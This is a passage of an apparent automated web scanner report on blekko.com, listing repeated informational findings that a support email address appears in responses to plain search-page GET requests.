Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=techmynd.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=techmynd.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:21 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.112. http://blekko.com/ws/xss+/cwe-79+/site=thespanner.co.uk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=thespanner.co.uk

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=thespanner.co.uk HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:32 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.113. http://blekko.com/ws/xss+/cwe-79+/site=veracode.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=veracode.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=veracode.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:17 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.114. http://blekko.com/ws/xss+/cwe-79+/site=xss-proxy.sourceforge.net previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=xss-proxy.sourceforge.net

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=xss-proxy.sourceforge.net HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:30 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.115. http://blekko.com/ws/xss+/cwe-79+/site=xss.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=xss.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=xss.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.116. http://blekko.com/ws/xss+/cwe-79+/site=xssed.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/cwe-79+/site=xssed.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/cwe-79+/site=xssed.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:22 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.117. http://blekko.com/ws/xss+/date previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/date

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:08 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.118. http://blekko.com/ws/xss+/flickr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/flickr

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/flickr HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:10 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.119. http://blekko.com/ws/xss+/foss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/foss

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/foss HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.120. http://blekko.com/ws/xss+/it previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/it

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/it HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.121. http://blekko.com/ws/xss+/rank previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/rank

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/rank HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:50 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.122. http://blekko.com/ws/xss+/rss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/rss

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/rss HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:49 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.123. http://blekko.com/ws/xss+/shop previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/shop

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/shop HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.124. http://blekko.com/ws/xss+/site=acunetix.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=acunetix.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=acunetix.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:01 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.125. http://blekko.com/ws/xss+/site=blogs.msdn.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=blogs.msdn.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=blogs.msdn.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:02 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.126. http://blekko.com/ws/xss+/site=cgisecurity.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=cgisecurity.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=cgisecurity.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:54 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.127. http://blekko.com/ws/xss+/site=en.wikipedia.org previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=en.wikipedia.org

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=en.wikipedia.org HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:52 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.128. http://blekko.com/ws/xss+/site=f-secure.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=f-secure.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=f-secure.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:03 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.129. http://blekko.com/ws/xss+/site=github.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=github.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=github.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:00 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.130. http://blekko.com/ws/xss+/site=golem.ph.utexas.edu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=golem.ph.utexas.edu

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=golem.ph.utexas.edu HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:14 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.131. http://blekko.com/ws/xss+/site=googleonlinesecurity.blogspot.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=googleonlinesecurity.blogspot.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=googleonlinesecurity.blogspot.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:16 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.132. http://blekko.com/ws/xss+/site=ha.ckers.org previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=ha.ckers.org

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=ha.ckers.org HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:53 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.133. http://blekko.com/ws/xss+/site=microsoft.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=microsoft.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=microsoft.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:10 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.134. http://blekko.com/ws/xss+/site=owasp.org previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=owasp.org

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=owasp.org HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:59 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.135. http://blekko.com/ws/xss+/site=praetorianprefect.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=praetorianprefect.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=praetorianprefect.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:06 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.136. http://blekko.com/ws/xss+/site=scmagazineus.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=scmagazineus.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=scmagazineus.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:15 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.137. http://blekko.com/ws/xss+/site=seancoates.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=seancoates.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=seancoates.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:05 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.138. http://blekko.com/ws/xss+/site=techmynd.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=techmynd.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=techmynd.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.139. http://blekko.com/ws/xss+/site=thespanner.co.uk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=thespanner.co.uk

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=thespanner.co.uk HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:13 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.140. http://blekko.com/ws/xss+/site=veracode.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=veracode.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=veracode.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.141. http://blekko.com/ws/xss+/site=xss-proxy.sourceforge.net previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=xss-proxy.sourceforge.net

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=xss-proxy.sourceforge.net HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.142. http://blekko.com/ws/xss+/site=xss.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=xss.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=xss.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:11 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.143. http://blekko.com/ws/xss+/site=xssed.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/site=xssed.com

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/xss+/site=xssed.com HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:57 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.144. http://blekko.com/ws/xss+/techblogs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
